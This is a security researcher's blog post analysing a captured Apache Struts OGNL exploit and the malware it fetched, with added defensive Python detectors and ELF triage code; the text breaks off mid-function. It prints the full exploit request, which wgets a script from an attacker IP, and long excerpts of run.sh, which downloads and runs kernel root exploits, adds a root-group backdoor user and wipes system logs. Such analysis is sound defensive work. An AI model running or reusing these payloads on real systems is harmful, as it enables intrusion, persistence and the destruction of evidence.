Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

It All Began With a Struts Exploit Attempt. Part 1

This post, and the following posts in this series, are a joint operation between myself and @MalwareMustDie. Check out his stuff at http://malwaremustdie.blogspot.com.au (Malware Must Die!).

Where I work, my IDS witnesses hundreds and thousands of attacks on the network daily. Every once in a while something pops up that catches my interest… This was one of those.

[1:2017173:4] ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body

Quick sidenote: the server they tried this against had already been patched for this exploit.

I have seen Struts exploits before, but this one stood out as interesting, since these attacks are not that common compared to the PHP-based attacks that pull down IRC bots written in Perl.

POST / HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: xxxxxxxxxxxxxxx
Content-Length: 515
Expect: 100-continue
redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),#res.setCharacterEncoding("UTF-8"),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"wget","http://61.147.103.21:8080/run.sh"})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[20000],#d.read(#e),#res.getWriter().println(#e),#res.getWriter().flush(),#res.getWriter().close()}

Why hello there!

The fun part we get out of that is:

{"wget","http://61.147.103.21:8080/run.sh"}
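As an added example (not code from the original post or from the IDS rule), here is a small Python detector in the spirit of the ET EXPLOIT signature above: it URL-decodes the whole body, finds OGNL expression wrappers and pulls out the argv handed to java.lang.ProcessBuilder, so the command array shown above falls out of the request automatically. The captured body quoted above is reused as test input; the percent-encoded and benign bodies are constructed.

```python
"""Flag Struts-style OGNL ProcessBuilder payloads in an HTTP form body.

Added example, not code from the original post or the quoted IDS rule. The
whole body is URL-decoded before matching because the 'redirect:' payload
sits in a parameter *name* and may arrive percent-encoded, so per-field
parsing that splits on '=' or '&' inside the expression is unreliable.
"""
import re
from urllib.parse import quote, unquote_plus

# OGNL expression wrapper: ${...} or %{...}; greedy + DOTALL so nested braces
# and line-wrapped payloads end up inside one captured expression.
OGNL_EXPR = re.compile(r"[$%]\{(.*)\}", re.DOTALL)

# new java.lang.ProcessBuilder(new java.lang.String[]{"wget","http://..."})
PB_ARGV = re.compile(
    r"java\.lang\.ProcessBuilder\s*\(\s*new\s+java\.lang\.String\s*\[\s*\]\s*\{([^}]*)\}",
    re.DOTALL,
)

# Java string literals inside the argv array, backslash escapes allowed.
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')


def find_processbuilder(body: str) -> list:
    """Return one finding per ProcessBuilder call found inside an OGNL expression.

    Each finding is {"argv": [...], "urls": [...]}; an empty list means no such
    payload (a plain '${...}' string in a value alone is not a hit).
    """
    decoded = unquote_plus(body)
    findings = []
    for expr in OGNL_EXPR.finditer(decoded):
        for call in PB_ARGV.finditer(expr.group(1)):
            argv = STRING_LIT.findall(call.group(1))
            findings.append({
                "argv": argv,
                # download locations: the IoCs to block at the proxy / hunt for in logs
                "urls": [a for a in argv if a.startswith(("http://", "https://", "ftp://"))],
            })
    return findings


def is_ognl_exec(body: str) -> bool:
    """Boolean form, the shape an IDS/WAF body hook would use."""
    return bool(find_processbuilder(body))


# Captured request body quoted in the post, reused here as test input.
SAMPLE_BODY = (
    'redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),'
    '#res.setCharacterEncoding("UTF-8"),#a=(new java.lang.ProcessBuilder(new java.lang.String[]'
    '{"wget","http://61.147.103.21:8080/run.sh"})).start(),#b=#a.getInputStream(),'
    '#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[20000],'
    '#d.read(#e),#res.getWriter().println(#e),#res.getWriter().flush(),#res.getWriter().close()}'
)

# Same payload fully percent-encoded, as a client library would send it (constructed).
SAMPLE_ENCODED = quote(SAMPLE_BODY, safe="")

# Benign body whose value merely contains a '${...}' string (constructed).
BENIGN_BODY = "username=bob&comment=price+is+%24%7B10%7D"

if __name__ == "__main__":
    for label, body in (("raw", SAMPLE_BODY), ("encoded", SAMPLE_ENCODED), ("benign", BENIGN_BODY)):
        print(label, find_processbuilder(body))
```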

DON’T MIND IF I DO

wget

It's the shell script that never ends…

8484ddd6282dc0b90d4e903866dc1526 run.sh

This is a massive script… (view it in full here: https://gist.github.com/anonymous/c947a9c3109a5fe353e8)

#!/bin/bash

fcheckr00t()
{
    echo " [*] Downloading exploit No. $CNT.."
    if [ $(whoami) = 'root' ] 2> /dev/null
    then
        echo " [*] g0tr00t with exploit No. $CNT"
        GOTROOT=1
    else
        echo " [*] Failed to g0tr00t with exploit No. $CNT"
        CNT=$((CNT + 1))
    fi
}

fcheckdep()
{
    if [ $(which wget) -z ] 2> /dev/null
    then
        if [ $(which curl) -z ] 2> /dev/null
        then 
            echo ' [*] No downloaders found, try self-contained version..'
            exit
        else
            DLER='curl -s -o .profild.key'
            CURLIT=1
        fi
    else
        DLER='wget -q'
        CURLIT=''
    fi
}


fcheckdep
CNT=1
GOTROOT=''
mkdir exploits
cd exploits

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-2
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-2
        ./1-2
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-3
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-3
        ./1-3
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-4
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-4
        ./1-4
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/2.6.18-374.12.1.el5-2012
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 2.6.18-374.12.1.el5-2012
        ./2.6.18-374.12.1.el5-2012
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

------ SNIP --------

This thing is massive…

    $ wc -l run.sh
    1721 run.sh

    $ ls -alh run.sh
    -rw-r----- 1 xxxxxx xxxxxx 29K Sep  2 18:55 run.sh

The script systematically tries each kernel exploit hosted on that web server, one after another.

------ SNIP --------

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER 'http://www.pingyan-china.com:8080/Linux_2.6(1).12'
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6\(1\).12
        ./Linux_2.6\(1\).12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/Linux_2.6.12
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6.12
        ./Linux_2.6.12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/vmsplice-local-root-exploit
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 vmsplice-local-root-exploit
        ./vmsplice-local-root-exploit
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/z1d-2011 
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 z1d-2011
        ./z1d-2011
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

cd ..
rm -rf exploits
CNT=''
DLER=''
CURLIT=''

if [ $GOTROOT = 1 ] 2> /dev/null
then
    RUSER='somesecguy'
    RPASS='g0tr00t'
    echo ' [*] Adding r00t user..'
    useradd -g 0 -G root -M -s /bin/bash -p $RPASS $RUSER
    echo
    echo " [*] Added r00t user: $RUSER"
    echo " [*] p455w0rd:  $RPASS"
    echo " [*] Clearing logs.."
    RPASS=''
    RUSER=''
    GOTROOT=''
    rm -rf /tmp/logs 2> /dev/null
    rm -rf /root/.ksh_history 2> /dev/null
    rm -rf /root/.bash_history 2> /dev/null
    rm -rf /root/.bash_logout 2> /dev/null
    rm -rf /usr/local/apache/logs 2> /dev/null
    rm -rf /usr/local/apache/log 2> /dev/null
    rm -rf /var/apache/logs 2> /dev/null
    rm -rf /var/apache/log 2> /dev/null
    rm -rf /var/run/utmp 2> /dev/null
    rm -rf /var/logs 2> /dev/null
    rm -rf /var/log 2> /dev/null
    rm -rf /var/adm 2> /dev/null
    rm -rf /etc/wtmp 2> /dev/null
    rm -rf /etc/utmp 2> /dev/null
    echo " [*] You g0tr00t, horray for you..."
killall -9 .profild.key
./profild.key &
    whoami
    id
else
    echo " [*] You didn't g0tr00t, sucks to be you..."
    whoami
    id
fi

After running through all these kernel exploits, if one of them returns successfully it will add its own (blatantly obvious) user to the system, put it in the root group, and give it a login shell.

It will then run its CnC connector (which MMD has a full analysis of below) and await further orders.
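The account, log-wiping and dropper behaviour described above gives a defender concrete things to check on a suspect host. The Python below is an added example, not part of the post or the malware: pure functions over already-collected passwd/shadow text, a set of existing paths and a process listing, run here against constructed sample data (the user name comes from run.sh; uid, timestamps and ps lines are made up).

```python
"""Host triage for the post-exploitation steps run.sh takes once it has root.

Added example, not part of the original post or the malware. The script above
creates a user with primary group 0 and a login shell (useradd -g 0 -G root -M
-s /bin/bash -p ...), deletes whole log trees plus utmp/wtmp, and backgrounds
its '.profild.key' binary. The functions take collected data rather than
touching the filesystem, so they work the same on a live host, a mounted
forensic image, or the constructed samples at the bottom.
"""

# Locations run.sh removes. Their absence on a Linux host is a signal in itself;
# /var/adm and /etc/wtmp are also in the script but rarely exist on modern systems.
EXPECTED_PRESENT = ["/var/log", "/var/run/utmp"]


def suspicious_passwd_entries(passwd_text: str) -> list:
    """Flag non-root accounts with uid 0 or gid 0 and a usable login shell."""
    hits = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or parts[0] == "root":
            continue
        name, _pw, uid, gid, _gecos, home, shell = parts
        nologin = shell == "" or shell.endswith(("/nologin", "/false"))
        if (uid == "0" or gid == "0") and not nologin:
            hits.append({"user": name, "uid": int(uid), "gid": int(gid),
                         "home": home, "shell": shell})
    return hits


def unhashed_shadow_entries(shadow_text: str) -> list:
    """Accounts whose shadow field is neither locked nor a crypt(3) hash.

    useradd -p expects an *already hashed* string. run.sh passes the plaintext
    'g0tr00t', so the shadow field literally reads g0tr00t: a password login
    with that value fails, but the gid-0 account still exists and must go.
    """
    odd = []
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) < 2:
            continue
        name, pw = parts[0], parts[1]
        if pw == "" or pw.startswith(("!", "*")):
            continue                                    # no password / locked
        if not (pw.startswith("$") or len(pw) == 13):   # $id$salt$hash or legacy DES
            odd.append(name)
    return odd


def missing_log_artifacts(existing_paths) -> list:
    """Standard log locations run.sh deletes that are absent from the host."""
    return [p for p in EXPECTED_PRESENT if p not in existing_paths]


def dropper_processes(ps_lines) -> list:
    """ps lines whose command names the dropped binary (the killall/exec target in run.sh)."""
    return [l.strip() for l in ps_lines if "profild.key" in l]


def triage(passwd_text, shadow_text, existing_paths, ps_lines) -> list:
    """Combine the checks into human-readable findings."""
    findings = []
    for a in suspicious_passwd_entries(passwd_text):
        msg = f"login account {a['user']} with uid {a['uid']} gid {a['gid']} shell {a['shell']}"
        if a["home"] not in existing_paths:
            msg += ", home directory absent (useradd -M)"
        findings.append(msg)
    for name in unhashed_shadow_entries(shadow_text):
        findings.append(f"shadow entry for {name} holds a non-hash value")
    for p in missing_log_artifacts(existing_paths):
        findings.append(f"expected log artifact missing: {p}")
    for proc in dropper_processes(ps_lines):
        findings.append(f"dropper process running: {proc}")
    return findings


# Constructed sample data resembling a host after run.sh succeeded.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    "somesecguy:x:1001:0::/home/somesecguy:/bin/bash",   # useradd -g 0 -M -s /bin/bash
])
SAMPLE_SHADOW = "\n".join([
    "root:$6$constructedsalt$constructedhashvalue:16315:0:99999:7:::",
    "daemon:*:16315:0:99999:7:::",
    "somesecguy:g0tr00t:16315:0:99999:7:::",             # plaintext stored by useradd -p
])
SAMPLE_PATHS = {"/var/run/utmp", "/root", "/home", "/etc/passwd"}   # /var/log was rm -rf'd
SAMPLE_PS = [
    "root         1  0.0  0.1 /sbin/init",
    "www-data  2210  0.0  0.4 /usr/sbin/apache2 -k start",
    "root      4242  0.3  0.2 ./.profild.key",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_PATHS, SAMPLE_PS):
        print("[!]", f)
```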

Now we pull apart some ELF binaries.

Here’s where my main man MalwareMustDie comes in. Most of the things it pulls down are ELF binaries, and MMD is the master of these, so I’ll leave those to him. I’ll be posting a few of his analysis runs in this post, but this will be a two-parter.

Most of these seem to be various kernel exploits used to escalate privileges, but we got some other binaries too; MMD will be looking at these.

I’ll slowly be going through the scripts and other text-based files here and will tie them into MalwareMustDie’s ELF analysis.

Here’s MMD’s initial hash’n’file run on all the lovely toys we found:

// #MalwareMustDie China ELF factory Case PM: @yinettesys 
// root directory of http://61.147.103.21:8080/ (116 files)
// date: Tue Sep  2 19:49:44 JST 2014
// pic snapshot: https://lh6.googleusercontent.com/-9rJWeo2uEOE/VAWh2D3QnUI/AAAAAAAAQxc/tLOTAb-Pg3g/s2176/000.png


---
#MalwareMustDie | IR Handle: MMDD-2014-0026

Full copy here: http://pastebin.com/3psXaj0C

And here’s MMD’s binary analysis of one of the ELF binaries that isn’t a kernel exploit. It is a standard DDoS binary that appears to dial home to a CnC:

# MalwareMustDie China ELF DDoSer Analysis
# Comments edited by Yinette
# Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
# ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
# VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/

# Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/ 
# Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/ a different port number as CNC)
https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/

# =============================
# Binary Analysis
# =============================

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048120
  Start of program headers:          52 (bytes into file)
  Start of section headers:          1199680 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         28
  Section header string table index: 25
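As an added example (not part of MMD's analysis), here is a Python parser for the 52-byte ELF32 header shown above, with the sanity checks a triage tool applies before trusting the program and section header tables. The sample's bytes are not on the page, so the header it parses is constructed from the values readelf printed (entry 0x8048120, 5 program headers of 32 bytes, 28 section headers of 40 bytes at offset 1199680, string table index 25).

```python
"""Parse the ELF32 header (Elf32_Ehdr) that readelf -h printed above.

Added example, not part of MMD's analysis. parse_elf32_header() decodes the
fixed 52-byte header and reports values a sane file would not have, the kind
of check behind file(1)/readelf complaints about corrupted header sizes.
build_sample_header() is constructed from the readelf fields, not the real file.
"""
import struct

ELFCLASS32, ELFDATA2LSB, ELFDATA2MSB = 1, 1, 2
EHDR_SIZE, PHENT_SIZE, SHENT_SIZE = 52, 32, 40        # ELF32 fixed sizes
# e_type .. e_shstrndx following the 16-byte e_ident; byte order chosen at runtime
EHDR_TAIL = "HHIIIIIHHHHHH"
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINE = {3: "Intel 80386", 8: "MIPS", 40: "ARM", 62: "x86-64"}


def parse_elf32_header(data: bytes, file_size: int = None) -> dict:
    """Decode an ELF32 header; 'anomalies' lists values that make the tables untrustworthy."""
    if len(data) < EHDR_SIZE or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_version, ei_osabi = data[4], data[5], data[6], data[7]
    if ei_class != ELFCLASS32:
        raise ValueError("ELF64 not handled here (64-byte header, 8-byte addresses)")
    if ei_data == ELFDATA2LSB:
        order = "<"
    elif ei_data == ELFDATA2MSB:
        order = ">"                      # big-endian targets such as MIPS MSB builds
    else:
        raise ValueError("unknown EI_DATA %d" % ei_data)
    (e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags, e_ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = struct.unpack_from(
        order + EHDR_TAIL, data, 16)

    anomalies = []
    if e_ehsize != EHDR_SIZE:
        anomalies.append("e_ehsize %d != %d" % (e_ehsize, EHDR_SIZE))
    if e_phnum and e_phentsize != PHENT_SIZE:
        anomalies.append("program header entry size %d != %d" % (e_phentsize, PHENT_SIZE))
    if e_shnum and e_shentsize != SHENT_SIZE:
        anomalies.append("section header entry size %d != %d" % (e_shentsize, SHENT_SIZE))
    if file_size is not None:
        if e_phoff + e_phnum * e_phentsize > file_size:
            anomalies.append("program header table runs past end of file")
        if e_shoff + e_shnum * e_shentsize > file_size:
            anomalies.append("section header table runs past end of file")
    if e_shnum and e_shstrndx >= e_shnum:
        anomalies.append("shstrndx %d out of range" % e_shstrndx)

    return {
        "class": "ELF32", "little_endian": order == "<", "osabi": ei_osabi,
        "type": E_TYPE.get(e_type, hex(e_type)),
        "machine": E_MACHINE.get(e_machine, hex(e_machine)),
        "entry": e_entry, "phoff": e_phoff, "shoff": e_shoff, "flags": e_flags,
        "phnum": e_phnum, "shnum": e_shnum, "shstrndx": e_shstrndx,
        "anomalies": anomalies,
    }


def build_sample_header(phentsize: int = PHENT_SIZE) -> bytes:
    """Constructed ELF32 header carrying the values readelf showed for the sample.

    phentsize is a knob for demonstrating the corrupted-header check.
    """
    e_ident = b"\x7fELF" + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0, 0]) + b"\x00" * 7
    return e_ident + struct.pack("<" + EHDR_TAIL,
        2, 3, 1, 0x8048120, 52, 1199680, 0, EHDR_SIZE, phentsize, 5, SHENT_SIZE, 28, 25)


if __name__ == "__main__":
    hdr = parse_elf32_header(build_sample_header())
    for k, v in hdr.items():
        print("%-14s %s" % (k, hex(v) if k in ("entry", "flags") else v))
```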

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048120 000120 0e3800 00  AX  0   0 32
  [ 4] __libc_freeres_fn PROGBITS        0812b920 0e3920 000f6e 00  AX  0   0  4
  [ 5] __libc_thread_fre PROGBITS        0812c890 0e4890 0000e2 00  AX  0   0  4
  [ 6] .fini             PROGBITS        0812c974 0e4974 00001a 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        0812c9a0 0e49a0 021eee 00   A  0   0 32
  [ 8] __libc_subfreeres PROGBITS        0814e890 106890 00003c 00   A  0   0  4
  [ 9] __libc_atexit     PROGBITS        0814e8cc 1068cc 000004 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        0814e8d0 1068d0 000004 00   A  0   0  4
  [11] .eh_frame         PROGBITS        0814e8d4 1068d4 016d08 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        081655dc 11d5dc 005049 00   A  0   0  4
  [13] .tdata            PROGBITS        0816b628 122628 000014 00 WAT  0   0  4
  [14] .tbss             NOBITS          0816b63c 12263c 00001c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        0816b63c 12263c 00002c 00  WA  0   0  4
  [16] .dtors            PROGBITS        0816b668 122668 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        0816b674 122674 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        0816b680 122680 00063c 00  WA  0   0 32
  [19] .got              PROGBITS        0816bcbc 122cbc 00005c 04  WA  0   0  4
  [20] .got.plt          PROGBITS        0816bd18 122d18 00000c 04  WA  0   0  4
  [21] .data             PROGBITS        0816bd40 122d40 001034 00  WA  0   0 32
  [22] .bss              NOBITS          0816cd80 123d74 0091d8 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          08175f58 123d74 000020 00  WA  0   0  4
  [24] .comment          PROGBITS        00000000 123d74 000fa5 00      0   0  1
  [25] .shstrtab         STRTAB          00000000 124d19 000126 00      0   0  1
  [26] .symtab           SYMTAB          00000000 1252a0 018110 10     27 1246  4
  [27] .strtab           STRTAB          00000000 13d3b0 03224e 00      0   0  1

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
  LOAD           0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW  0x1000
  NOTE           0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R   0x4
  TLS            0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

Offset 0x000000d4 | len x00000020:
  Owner         Data size       Description
  GNU           0x00000010      NT_VERSION (version)

// Notes:
no dynamic section 
no relocations 
no unwind sections 
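Added example (my own code, not MMD's tooling or anything from the binary's authors): a small Python triage script that reads the same ELF header and program-header fields readelf printed above and reports the two characteristics that matter for a dropper like this one, that it is fully static (no PT_DYNAMIC and no PT_INTERP, so it has no libc dependency on the victim and runs on nearly any 32-bit Linux) and that its GNU_STACK segment is RW only. Section headers are deliberately not needed, since they are the first thing a packer or strip removes. The sample bytes are the values from the readelf output packed back into a header and five program headers; it is a constructed blob with no code after the headers.

```python
import struct

# ELF constants used below (from the ELF32 specification).
PT_LOAD, PT_DYNAMIC, PT_INTERP, PT_NOTE, PT_TLS = 1, 2, 3, 4, 7
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
PT_NAMES = {PT_LOAD: "LOAD", PT_DYNAMIC: "DYNAMIC", PT_INTERP: "INTERP",
            PT_NOTE: "NOTE", PT_TLS: "TLS", PT_GNU_STACK: "GNU_STACK"}
EM_NAMES = {3: "Intel 80386", 40: "ARM", 62: "AMD x86-64"}
ET_NAMES = {1: "REL", 2: "EXEC", 3: "DYN"}

EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")  # 52-byte ELF32 header, little-endian
PHDR32 = struct.Struct("<IIIIIIII")         # 32-byte ELF32 program header


def perm(flags):
    """Render p_flags the way readelf does, e.g. 'R-X' or 'RW-'."""
    return "".join(c if flags & bit else "-"
                   for c, bit in (("R", PF_R), ("W", PF_W), ("X", PF_X)))


def parse_elf32(blob):
    """Triage a little-endian ELF32 image from its header and program headers.

    Only the ELF header and the program header table are read; the loader
    needs those, so they survive stripping and most packers.
    """
    if len(blob) < EHDR32.size or blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    (ident, e_type, e_machine, _version, e_entry, e_phoff, e_shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = EHDR32.unpack_from(blob)
    if ident[4] != 1 or ident[5] != 1:
        raise ValueError("only ELF32 little-endian is handled here")
    if e_phentsize != PHDR32.size:
        raise ValueError("unexpected program header entry size")

    segments = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + PHDR32.size > len(blob):
            raise ValueError("program header table runs past end of file")
        p_type, p_off, p_vaddr, _paddr, p_filesz, p_memsz, p_flags, _align = PHDR32.unpack_from(blob, off)
        segments.append({"name": PT_NAMES.get(p_type, hex(p_type)), "type": p_type,
                         "offset": p_off, "vaddr": p_vaddr, "filesz": p_filesz,
                         "memsz": p_memsz, "flags": p_flags, "perm": perm(p_flags)})

    types = {s["type"] for s in segments}
    stack = [s for s in segments if s["type"] == PT_GNU_STACK]
    return {
        "class": "ELF32",
        "type": ET_NAMES.get(e_type, str(e_type)),
        "machine": EM_NAMES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
        "segments": segments,
        # No PT_INTERP and no PT_DYNAMIC: no dynamic loader is involved, the
        # binary carries its own libc and only depends on the kernel ABI.
        "static": not (types & {PT_DYNAMIC, PT_INTERP}),
        # PT_GNU_STACK present without PF_X means a non-executable stack.
        "nx_stack": bool(stack) and not (stack[0]["flags"] & PF_X),
        # As claimed by the header; the table itself is not read here.
        "has_section_headers": e_shoff != 0 and e_shnum != 0,
    }


def _ph(p_type, off, vaddr, filesz, memsz, flags, align):
    return PHDR32.pack(p_type, off, vaddr, vaddr, filesz, memsz, flags, align)


# Constructed sample: the values from the readelf output packed back into a
# header plus five program headers (no code and no section table follow).
SAMPLE = EHDR32.pack(
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9,   # e_ident: ELF32, LSB, version 1, SysV
    2, 3, 1, 0x08048120, 52, 1199680, 0, 52, 32, 5, 40, 28, 25,
) + b"".join([
    _ph(PT_LOAD, 0x000000, 0x08048000, 0x122625, 0x122625, PF_R | PF_X, 0x1000),
    _ph(PT_LOAD, 0x122628, 0x0816B628, 0x0174C, 0x0A950, PF_R | PF_W, 0x1000),
    _ph(PT_NOTE, 0x0000D4, 0x080480D4, 0x20, 0x20, PF_R, 4),
    _ph(PT_TLS, 0x122628, 0x0816B628, 0x14, 0x30, PF_R, 4),
    _ph(PT_GNU_STACK, 0, 0, 0, 0, PF_R | PF_W, 4),
])

if __name__ == "__main__":
    info = parse_elf32(SAMPLE)
    print(f"{info['class']} {info['type']} {info['machine']} entry={info['entry']:#x} "
          f"static={info['static']} nx_stack={info['nx_stack']}")
    for s in info["segments"]:
        print(f"  {s['name']:<10} {s['perm']} vaddr={s['vaddr']:#010x} memsz={s['memsz']:#x}")
```

The second LOAD segment having memsz larger than filesz is the .bss (about 36 KB here), which is normal; the interesting bit for triage is the static flag, because a static build is what lets one binary run on the mixed bag of old kernels a mass exploitation script like run.sh hits.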

# =============================
# Reversing w/debug PoC
# =============================

// first section reversed (for characteristics)
            ;-- section..text:
            0x08048120    31ed         xor ebp, ebp
            0x08048122    5e           pop esi
            0x08048123    89e1         mov ecx, esp
            0x08048125    83e4f0       and esp, 0xfffffff0
            0x08048128    50           push eax
            0x08048129    54           push esp
            0x0804812a    52           push edx
            0x0804812b    68f4c20c08   push sym.__libc_csu_fini ; 0x080cc2f4
            0x08048130    689cc20c08   push sym.__libc_csu_init ; 0x080cc29c
            0x08048135    51           push ecx
            0x08048136    56           push esi
            0x08048137    681ca70408   push sym.main ; 0x0804a71c
            0x0804813c    e8cf390800   call sym.__libc_start_main
               0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
            0x08048141    f4           hlt
            0x08048142    90           nop
            0x08048143    90           nop

// Chinese text appears quite often throughout the binary; this ties in with the Chinese source these were obtained from.
// Not sure where the katakana on the first line came from though... - Yinette

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG 
0x0075693  B4CUNG
0x0102520  i18n:1999
  :

// config:
0x00E5C22  fake.cfg
// template:
%d
%d.%d.%d.%d:%d.%d.%d.%d
%d:%d

// poc:
# cat fake.cfg
0
YOUR-IP-HERE:AND-HERE
10000:60000

// Obtain IP of interface with the default route and write it to fake.cfg:

getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0


// Does a DNS query for www.baidu.com against Google's open resolver at 8.8.8.8 (to test for internet reachability)

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74
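Added example (my code, not part of MMD's notes): a Python decoder for the two buffers strace printed above, for anyone who wants to read the bytes or turn that reachability check into a detection. The query is the full 31 bytes; the response was cut at 32 bytes by strace's default string limit, so the decoder reports what the header promised (two answers) against what was actually present and flags the capture as truncated rather than failing. The complete response with a private placeholder address is a constructed sample, since the real answer bytes are not on the page.

```python
import struct

QTYPE_NAMES = {1: "A", 5: "CNAME", 28: "AAAA"}


def _read_name(pkt, off, depth=0):
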